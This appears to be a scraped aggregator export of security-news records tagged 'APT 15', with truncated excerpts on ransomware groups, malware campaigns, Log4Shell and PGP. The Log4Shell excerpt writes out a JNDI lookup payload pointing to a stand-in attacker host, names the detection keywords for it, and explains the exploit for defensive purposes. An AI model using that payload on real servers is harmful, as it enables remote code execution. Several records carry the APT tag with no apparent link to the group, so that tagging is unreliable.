2022-06-27T15:01:06+00:00 https://www.silicon.fr/rachat-vmware-broadcom-cigref-alerte-442283.html www.secnews.physaphae.fr/article.php?IdArticle=5486507 False None APT 15 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence COBALT MIRAGE Conducts Ransomware Operations in U.S. (published: May 12, 2022) Secureworks researchers describe campaigns by Iran-sponsored group Cobalt Mirage. These actors are likely part of a larger group, Charming Kitten (Phosphorus, APT35, Cobalt Illusion). In 2022, Cobalt Mirage deployed BitLocker ransomware on a US charity systems, and exfiltrated data from a US local government network. Their ransomware operations appear to be a low-scale, hands-on approach with rare tactics such as sending a ransom note to a local printer. The group utilized its own custom binaries including a Fast Reverse Proxy client (FRPC) written in Go. It also relied on mass scanning for known vulnerabilities (ProxyShell, Log4Shell) and using commodity tools for encryption, internal scanning, and lateral movement. Analyst Comment: However small your government or NGO organization is, it still needs protection from advanced cyber actors. Keep your system updated, and employ mitigation strategies when updates for critical vulnerabilities are not available. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 Tags: Cobalt Mirage, Phosphorous, Cobalt Illusion, TunnelVision, Impacket, wmiexec, Softperfect network scanner, LSASS, RDP, Powershell, BitLocker, Ransomware, Fast Reverse Proxy client, FRP, FRPC, Iran, source-country:IR, USA, target-country:US, Cyberespionage, Government, APT, Go, Log4j2, ProxyShell, CVE-2021-34473, CVE-2021-45046, CVE-2021-44228, CVE-2020-12812, CVE-2021-31207, CVE-2018-13379, CVE-2021-34523, CVE-2019-5591 SYK Crypter Distributing Malware Families Via Discord (published: May 12, 2022) Morphisec researchers discovered a new campaign abusing popular messaging platform Discord content distribution network (CDN). If a targeted user activates the phishing attachment, it starts the DNetLoader malware that reaches out to the hardcoded Discord CDN link and downloads a next stage crypter such as newly-discovered SYK crypter. SYK crypter is being loaded into memory where it decrypts its configuration and the next stage payload using hardcoded keys and various encryption methods. It detects and impairs antivirus solutions and checks for d]]> 2022-05-17T15:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-costa-rica-in-ransomware-emergency-charming-kitten-spy-and-ransom-saitama-backdoor-hides-by-sleeping-and-more www.secnews.physaphae.fr/article.php?IdArticle=4668209 False Ransomware,Malware,Tool,Vulnerability,Threat,Conference APT 35,APT 15,APT 34 None Security Affairs - Blog Secu 2022-05-13T06:52:53+00:00 https://securityaffairs.co/wordpress/131218/apt/iran-cobalt-mirage-ransomware-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=4589476 False Ransomware,Threat APT 15,APT 15 4.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-05-12T06:56:45+00:00 https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html www.secnews.physaphae.fr/article.php?IdArticle=4583977 False Ransomware,Malware,Threat,Conference APT 35,APT 15 4.0000000000000000 SecureWork - SecureWork: incident response 2022-05-12T00:00:00+00:00 https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us www.secnews.physaphae.fr/article.php?IdArticle=4593474 False Ransomware,Threat APT 15,APT 15 None Schneier on Security - Chercheur Cryptologue Américain 2022-05-06T11:01:16+00:00 https://www.schneier.com/blog/archives/2022/05/corporate-involvement-in-international-cybersecurity-treaties.html www.secnews.physaphae.fr/article.php?IdArticle=4554738 False None APT 15 None Korben - Bloger francais Suite]]> 2022-03-11T08:00:00+00:00 https://korben.info/autocompletion-terminal-macos-fig.html www.secnews.physaphae.fr/article.php?IdArticle=4259191 False None APT 15 None Fortinet ThreatSignal - Harware Vendor 2022-03-10T23:39:03+00:00 https://fortiguard.fortinet.com/threat-signal-report/4449 www.secnews.physaphae.fr/article.php?IdArticle=4258974 False Malware,Tool,Vulnerability,Threat,Guideline APT 15,APT 15,APT 41 None knowbe4 - cybersecurity services [Heads Up] FBI Warns Against New Criminal QR Code Scams   Email not displaying? | CyberheistNews Vol 12 #07  |   Feb. 15th., 2022 [Heads Up] FBI Warns Against New Criminal QR Code Scams QR codes have been around for many years. While they were adopted for certain niche uses, they never did quite reach their full potential. They are a bit like Rick Astley in that regard, really popular for one song, but well after the boat had sailed. Do not get me wrong, Rick Astley achieved a lot. In recent years, he has become immortalized as a meme and Rick roller, but he could have been so much more. However, in recent years, with lockdown and the drive to keep things at arms length, QR codes have become an efficient way to facilitate contactless communications, or the transfer of offers without physically handing over a coupon. As this has grown in popularity, more people have become familiar with how to generate their own QR codes and how to use them as virtual business cards, discount codes, links to videos and all sorts of other things. QRime Codes As with most things, once they begin to gain a bit of popularity, criminals move in to see how they can manipulate the situation to their advantage. Recently, we have seen fake QR codes stuck to parking meters enticing unwitting drivers to scan the code, and hand over their payment details believing they were paying for parking, whereas they were actually handing over their payment information to criminals. The rise in QR code fraud resulted in the FBI releasing an advisory warning against fake QR codes that are being used to scam users. In many cases, a fake QR code will lead people to a website that looks like the intended legitimate site. So, the usual verification process of checking the URL and any other red flags apply. CONTINUED with links and 4 example malicious QR codes on the KnowBe4 blog: https://blog.knowbe4.com/qr-codes-in-the-time-of-cybercrime ]]> 2022-02-15T14:24:51+00:00 https://blog.knowbe4.com/cyberheistnews-vol-12-07-heads-up-fbi-warns-against-new-criminal-qr-code-scams www.secnews.physaphae.fr/article.php?IdArticle=4133418 False Ransomware,Data Breach,Spam,Malware,Threat,Guideline APT 43,APT 15 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1]]> 2021-12-15T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apache-log4j-zero-day-exploit-google-fighting-glupteba-botnet-vixen-panda-targets-latin-america-and-europe-and-more www.secnews.physaphae.fr/article.php?IdArticle=3800465 False Malware,Tool,Vulnerability,Threat,Cloud APT 29,APT 25,APT 37,APT 15,APT 15 None Fortinet ThreatSignal - Harware Vendor 2021-12-07T15:08:56+00:00 https://www.fortiguard.com/threat-signal-report/4330 www.secnews.physaphae.fr/article.php?IdArticle=3791016 False Malware,Patching,Guideline APT 25,APT 15 4.0000000000000000 SecurityWeek - Security News 2021-12-07T13:04:42+00:00 https://www.securityweek.com/microsoft-seizes-domains-used-china-linked-apt-nickel www.secnews.physaphae.fr/article.php?IdArticle=3757112 False Threat APT 15 None IT Security Guru - Blog Sécurité 2021-12-07T11:52:04+00:00 https://www.itsecurityguru.org/2021/12/07/dozens-of-malicious-apt15-sites-seized-by-microsoft/?utm_source=rss&utm_medium=rss&utm_campaign=dozens-of-malicious-apt15-sites-seized-by-microsoft www.secnews.physaphae.fr/article.php?IdArticle=3756579 False None APT 25,APT 15,APT 15 3.0000000000000000 Security Affairs - Blog Secu 2021-12-07T10:09:54+00:00 https://securityaffairs.co/wordpress/125365/apt/microsoft-seized-apt15-domains.html?utm_source=rss&utm_medium=rss&utm_campaign=microsoft-seized-apt15-domains www.secnews.physaphae.fr/article.php?IdArticle=3756234 False None APT 25,APT 15 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2021-12-07T00:14:47+00:00 https://thehackernews.com/2021/12/microsoft-seizes-42-malicious-web.html www.secnews.physaphae.fr/article.php?IdArticle=3756061 False None APT 15 None Bleeping Computer - Magazine Américain 2021-12-06T16:53:08+00:00 https://www.bleepingcomputer.com/news/microsoft/microsoft-seizes-sites-used-by-apt15-chinese-state-hackers/ www.secnews.physaphae.fr/article.php?IdArticle=3754083 False None APT 15 None Wired Threat Level - Security News 2021-12-05T12:00:00+00:00 https://www.wired.com/story/youtube-5-hour-icarly-analysis-videos www.secnews.physaphae.fr/article.php?IdArticle=3748810 False None APT 15 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag. Trending Cyber News and Threat Intelligence S.O.V.A. – A New Android Banking Trojan with Fowl Intentions (published: September 10, 2021) ThreatFabric researchers have discovered a new Android banking trojan called S.O.V.A. The malware is still in the development and testing phase and the threat actor is publicly-advertising S.O.V.A. for trial runs targeting banks to improve its functionality. The trojan’s primary objective is to steal personally identifiable information (PII). This is conducted through overlay attacks, keylogging, man-in-the-middle attacks, and session cookies theft, among others. The malware author is also working on other features such as distributed denial-of-service (DDoS) and ransomware on S.O.V.A.’s project roadmap. Analyst Comment: Always keep your mobile phone fully patched with the latest security updates. Only use official locations such as the Google Play Store / Apple App Store to obtain your software, and avoid downloading applications, even if they appear legitimate, from third-party stores. Furthermore, always review the permissions an app will request upon installation. MITRE ATT&CK: [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Man-in-the-Middle - T1557 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Network Denial of Service - T1498 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 Tags: Android, Banking trojan, S.O.V.A., Overlay, Keylogging, Cookies, Man-in-the-Middle Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances (published: September 9, 2021) Unit 42 researchers identified and disclosed critical security issues in Microsoft’s Container-as-a-Service (CaaS) offering that is called Azure Container Instances (ACI). A malicious Azure user could have compromised the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers. Researchers gave the vulnerability a specific name, Azurescape, highlighting its significance: it the first cross-account container takeover in the public cloud. Analyst Comment: Azurescape vulnerabilities could have allowed an attacker to execute code on other users' containers, steal customer secrets and images deployed to the platform, and abuse ACI's infrastructure processing power. Microsoft patched ACI shortly after the discl]]> 2021-09-14T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-azurescape-cloud-threat-mshtml-0-day-in-the-wild-confluence-cloud-hacked-to-mine-monero-and-more www.secnews.physaphae.fr/article.php?IdArticle=3369753 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Guideline Uber,APT 15,APT 41 None Bleeping Computer - Magazine Américain 2021-09-02T13:31:10+00:00 https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-first-windows-11-nickel-build-to-insiders/ www.secnews.physaphae.fr/article.php?IdArticle=3326599 False None APT 15 None 01net. Actualites - Securite - Magazine Francais ]]> 2021-06-17T06:12:51+00:00 https://www.01net.com/actualites/attention-ces-faux-portefeuilles-ledger-sont-concus-pour-derober-votre-cryptomonnaie-2044630.html www.secnews.physaphae.fr/article.php?IdArticle=2947270 False None APT 15 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2021-04-19T04:20:51+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/PBZrO95kqJ8/passwordless-more-mirage-than-reality.html www.secnews.physaphae.fr/article.php?IdArticle=2665676 False None APT 15,APT 15 None UnderNews - Site de news "pirate" francais Cybersécurité : les Français craignent pour leur identité en ligne first appeared on UnderNews.]]> 2021-03-05T11:15:25+00:00 https://www.undernews.fr/reseau-securite/cybersecurite-les-francais-craignent-pour-leur-identite-en-ligne.html www.secnews.physaphae.fr/article.php?IdArticle=2438517 False None APT 15 None TroyHunt - Blog Security 2021-01-20T17:00:09+00:00 https://arstechnica.com/?p=1736298 www.secnews.physaphae.fr/article.php?IdArticle=2219869 False None APT 15 None CybeReason - Vendor blog We spent some time with Katie Nickels - current Director of Intelligence at Red Canary and formerly MITRE ATT&CK Threat Intelligence Lead - to discuss applied threat intelligence, prioritizing threats for impact, and working incident response in remote environments - check it out...]]> 2020-12-07T20:46:46+00:00 https://www.cybereason.com/blog/ever-evolving-katie-nickels-on-incident-response-in-a-remote-world www.secnews.physaphae.fr/article.php?IdArticle=2083469 False Threat,Guideline APT 15 None Bleeping Computer - Magazine Américain 2020-07-02T12:11:14+00:00 https://www.bleepingcomputer.com/news/security/researchers-link-apt15-hackers-to-chinese-military-company/ www.secnews.physaphae.fr/article.php?IdArticle=1785712 False None APT 15 None ZD Net - Magazine Info 2020-07-02T01:25:33+00:00 https://www.zdnet.com/article/connection-discovered-between-chinese-hacker-group-apt15-and-defense-contractor/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=1784728 False Malware APT 15 None RedTeam PL - DarkTrace: AI bases detection 2020-06-18T22:10:28+00:00 https://blog.redteam.pl/2020/06/spear-phishing-muhammad-appleseed1-mail-ru.html www.secnews.physaphae.fr/article.php?IdArticle=1798879 False Threat,Guideline APT 15 None Security Affairs - Blog Secu 2020-05-28T07:51:22+00:00 https://securityaffairs.co/wordpress/103903/apt/ke3chang-group-ketrum-backdoor.html?utm_source=rss&utm_medium=rss&utm_campaign=ke3chang-group-ketrum-backdoor www.secnews.physaphae.fr/article.php?IdArticle=1737959 False Malware APT 25,APT 15 None Bleeping Computer - Magazine Américain 2020-05-26T11:22:03+00:00 https://www.bleepingcomputer.com/news/security/hacking-group-builds-new-ketrum-malware-from-recycled-backdoors/ www.secnews.physaphae.fr/article.php?IdArticle=1735030 False Malware APT 25,APT 15 None NoticeBored - Experienced IT Security professional At the bottom of a Travelex update on their incident, I spotted this yesterday:Customer PrecautionsBased on the public attention this incident has received, individuals may try to take advantage of it and attempt some common e-mail or telephone scams. Increased awareness and vigilance are key to detecting and preventing this type of activity. As a precaution, if you receive a call from someone claiming to be from Travelex that you are not expecting or you are unsure about the identity of a caller, you should end the call and call back on 0345 872 7627. If you have any questions or believe you have received a suspicious e-mail or telephone call, please do not hesitate to contact us. Although I am not personally aware of any such 'e-mail or telephone scams', Travelex would know better than me - and anyway even if there have been no scams as yet, the warning makes sense: there is indeed a known risk of scammers exploiting major, well-publicised incidents such as this. We've seen it before, such as fake charity scams taking advantage of the public reaction to natural disasters such as the New Orleans floods, and - who knows - maybe the Australian bushfires.At the same time, this infosec geek is idly wondering whether the Travelex warning message and web page are legitimate. It is conceivable that the cyber-criminals and hackers behind the ransomware incident may still have control of the Travelex domains, webservers and/or websites, perhaps all their corporate comms including the Travelex Twitter feeds and maybe even the switchboard behind that 0345 number. I'm waffling on about corporate identity theft, flowing on from the original incident.I appreciate the scenario I'm postulating seems unlikely but bear with me and my professional paranoia for a moment. Let's explore the hypot]]> 2020-01-22T09:00:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/tIKSOS4dN4A/nblog-jan-22-further-lessons-from.html www.secnews.physaphae.fr/article.php?IdArticle=1503295 False Ransomware,Malware,Patching,Guideline APT 15 None Security Affairs - Blog Secu 2019-07-24T03:07:00+00:00 https://securityaffairs.co/wordpress/88824/apt/apt15-okrum-backdoor.html www.secnews.physaphae.fr/article.php?IdArticle=1220700 True Threat APT 25,APT 15 None SecurityWeek - Security News 2019-07-23T14:31:00+00:00 https://www.securityweek.com/china-linked-threat-actor-using-new-backdoor www.secnews.physaphae.fr/article.php?IdArticle=1220616 False Threat APT 15 None Malwarebytes Labs - MalwarebytesLabs A roundup of cybersecurity news from July 15–21, including the Zoom camera vulnerability, Extenbro, Sodinokibi, Magecart, and cybersecurity challenges facing the education sector. Categories: A week in security Tags: 2fa bypassadvanced persistent threatAndroid appsAPTbackdoorBitPaymer ransomwarebrowser extensionsbulletproofchromecybersecurity educationDataSpiiDDos attackDoppelPaymerEvilGnomeExtenbroFaceAppfacebookFacebook reporting toolfirefoxgenerationInstagramKe3changMagecartMedia File JackingprivacyRingCentral flawSodinokibitelegramvital infrastructurewhatsappZhumu flawzoom zero-day (Read more...) ]]> 2019-07-22T15:50:03+00:00 https://blog.malwarebytes.com/a-week-in-security/2019/07/a-week-in-security-july-15-21/ www.secnews.physaphae.fr/article.php?IdArticle=1220089 False None APT 25,APT 15 None IT Security Guru - Blog Sécurité 2019-07-19T14:35:01+00:00 https://www.itsecurityguru.org/2019/07/19/malware-that-waits-for-three-mouse-clicks-before-running/ www.secnews.physaphae.fr/article.php?IdArticle=1214430 False Malware,Threat APT 25,APT 15 2.0000000000000000 We Live Security - Editeur Logiciel Antivirus ESET Tracking the malicious activities of the elusive Ke3chang APT group, ESET researchers have discovered new versions of malware families linked to the group, and a previously unreported backdoor ]]> 2019-07-18T09:30:01+00:00 https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/ www.secnews.physaphae.fr/article.php?IdArticle=1212162 False Malware APT 25,APT 15 None Bleeping Computer - Magazine Américain 2019-07-18T07:03:00+00:00 https://www.bleepingcomputer.com/news/security/new-okrum-malware-used-by-ke3chang-group-to-target-diplomats/ www.secnews.physaphae.fr/article.php?IdArticle=1212312 False Malware,Threat APT 25,APT 15 None Data Security Breach - Site de news Francais 2019-05-12T16:08:00+00:00 https://www.datasecuritybreach.fr/equifax-le-pirate-a-plus-de-14-milliard-de-perte/ www.secnews.physaphae.fr/article.php?IdArticle=1104143 False None APT 15,Equifax None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The world of cybersecurity is an ever-changing one of constant preemptive preparation, where companies are forced to hunt for any kinks in their defenses to ensure that they’re as protected as possible. Working as an ethical hacker allows information technology graduates to come into the job market and aid companies in finding those kinks so that they can remain safe in a world of increasing cybercrime. As the world of cybersecurity grows more linked with everyday life, it’s important to know what awaits those entering this job market. Great pay Ethical hacking is a skilled trade, reserved for those that know their way around design and programming. The average salary for ethical hacking offers a wide range - between $24,760 and $132,322. There are also many freelancing opportunities for one-time or part time positions, which can offer multiple opportunities and flexible pay. For graduates looking to deal with school loans or simply wishing to jumpstart their finances, the high ceiling of earning averages provides an excellent opportunity Rapid growth Ethical hacking is one of the swiftest growing areas for information technology graduates, if for no other reason than for demand. The increasingly connected internet of things is forcing companies to have a powerful online presence, which then needs to be defended. As more and more companies become connected to the internet, the need for ethical hackers to test their defenses increases as well. In fact, the United States Bureau of Labor Statistics expect to see information security analysts, a category which includes ethical hackers, to see job growth increase by as much as 28% from 2016 to 2026. This is four times the job growth that other sectors expect to see, which sits around 7%. The job growth for ethical hacking is due to the increased need for online security, and means that graduates entering the field can expect a surplus of available positions. Additionally, the constant growth of jobs equates to advanced job options, as graduates are likely to always be able to find another position if the need arises. Increasing skill sets Graduates are likely to have been focusing on one or two subjects while going through their collegiate career. Ethical hacking provides an excellent way to diversify the skills one has learned, as well as providing opportunities to grow in acclaim. Many ethical hacking positions may require brief training courses that will end with the ethical hacker being rewarded with certification and verification of skills. While often optional, this is highly recommended, as certified ethical hacking professionals earn significantly more than their non-certified peers. Ultimately, many experts believe ethical hacking to be one of the most prominent fields of information security analysis in the future. Ethical hac]]> 2019-04-18T13:00:00+00:00 https://feeds.feedblitz.com/~/600960344/0/alienvault-blogs~Ethical-hacking-as-a-postgraduation-opportunity www.secnews.physaphae.fr/article.php?IdArticle=1093967 False None APT 15 None Wired Threat Level - Security News 2019-03-15T11:00:00+00:00 https://www.wired.com/story/josh-harris-social-media-totally-wired-excerpt www.secnews.physaphae.fr/article.php?IdArticle=1071005 False None APT 15 None Krebs on Security - Chercheur Américain 2019-01-16T00:52:03+00:00 https://krebsonsecurity.com/2019/01/stole-24-million-but-still-cant-keep-a-friend/ www.secnews.physaphae.fr/article.php?IdArticle=994420 False None APT 15 None Zataz - Magazine Francais de secu Fuite de données corrigée pour Info Greffe est apparu en premier sur ZATAZ. ]]> 2018-09-23T14:33:04+00:00 https://www.zataz.com/fuite-de-donnees-corrigee-pour-info-greffe/ www.secnews.physaphae.fr/article.php?IdArticle=821188 False None APT 15 None Krebs on Security - Chercheur Américain 2018-08-02T15:11:04+00:00 https://krebsonsecurity.com/2018/08/the-year-targeted-phishing-went-mainstream/ www.secnews.physaphae.fr/article.php?IdArticle=763823 False None APT 15 None TechRepublic - Security News US 2018-07-31T14:03:05+00:00 https://www.techrepublic.com/article/google-chrome-launches-on-daydream-headsets-could-make-enterprise-vr-training-a-reality/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=760505 False None APT 15 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2018-06-19T21:58:03+00:00 https://threatpost.com/apt15-pokes-its-head-out-with-upgraded-miragefox-rat/132943/ www.secnews.physaphae.fr/article.php?IdArticle=713210 False None APT 15 None Security Affairs - Blog Secu 2018-06-18T12:41:02+00:00 https://securityaffairs.co/wordpress/73636/apt/apt15-miragefox-malware.html www.secnews.physaphae.fr/article.php?IdArticle=710278 False None APT 25,APT 15 None SecurityWeek - Security News 2018-06-18T04:38:03+00:00 https://www.securityweek.com/china-linked-apt15-develops-new-miragefox-malware www.secnews.physaphae.fr/article.php?IdArticle=712098 False None APT 15 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC If you don’t already know what Pretty Good Privacy (PGP) is; you may have heard of PGP before, perhaps during a discussion on how to secure your communications, or perhaps in one of those how-to maintain privacy guides. PGP is a popular solution for encrypting, decrypting, signing, and verifying messages and files, often found in email communications and package repository identity verification (because security matters). Most generic guides simply explain PGP at a high-level or how to encrypt and decrypt messages using specific software, and not much more than that. The goal of this introduction to PGP is to illustrate a more timeless and operational approach to using PGP safely, with respect to both information security and operational security. Firstly, we introduce PGP theoretically and practically, this means understanding how PGP works and what we can actually do with PGP. To better understand our security stance, we assess the CIA Triad, a theoretical Information Security model, that considers the confidentiality, integrity, and availability of information. Next, we get familiar with our threat model (similar to OPSEC Model); in this step, we analyze personalized risks and threats. To mitigate any identified threats and reduce risk, we implement operational security practices. At a more concise glance, we will discuss the following: PGP, OpenPGP & GPG Public & Private Key Pairs Information Security (CIA Triad) Confidentiality: message encryption, information storage Integrity: message/file authenticity, web of trust Availability: key servers, web of trust, metadata Assessing Threats & Risk Threat Modeling Operational Security Clients & Use Guides: Windows, Linux, Mac, Web With that caveat in mind, let’s jump straight in. PGP, OpenPGP & GPG: What is it? PGP is a protocol used for encrypting, decrypting and signing messages or files using a key pair. PGP is primarily used for encrypting communications at the Application layer, typically used for one-on-one encrypted messaging. You may find yourself needing to use PGP if you want to be certain that only the intended receiver can access your private message, thwarting the efforts of intercepting parties, or if you just want to verify the sender’s identity. There are different variations of PGP: OpenPGP, PGP and GPG, but they generally all do the same thing. Here is the quick terminology run-down: PGP: Pretty Good Privacy, original proprietary protocol. Released in 1991. OpenPGP: Pretty Good Privacy, but it is an open-source version, and it has become the universally-accepted PGP standard. Released in 1997. GPG: GNU Privacy Guard, another popular solution that follows OpenPGP standards. Released in 1999. When someone says PGP, it is generally s]]> 2018-03-26T13:00:00+00:00 http://feeds.feedblitz.com/~/535192976/0/alienvault-blogs~Explain-PGP-Encryption-An-Operational-Introduction www.secnews.physaphae.fr/article.php?IdArticle=542673 False None APT 15 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2018-03-13T16:16:02+00:00 https://threatpost.com/china-linked-apt15-used-myriad-of-new-tools-to-hack-uk-government-contractor/130376/ www.secnews.physaphae.fr/article.php?IdArticle=510990 False None APT 15 None Security Affairs - Blog Secu 2018-03-12T18:07:04+00:00 http://securityaffairs.co/wordpress/70140/hacking/apt15-uk-gov-contractor.html www.secnews.physaphae.fr/article.php?IdArticle=508870 False None APT 15 None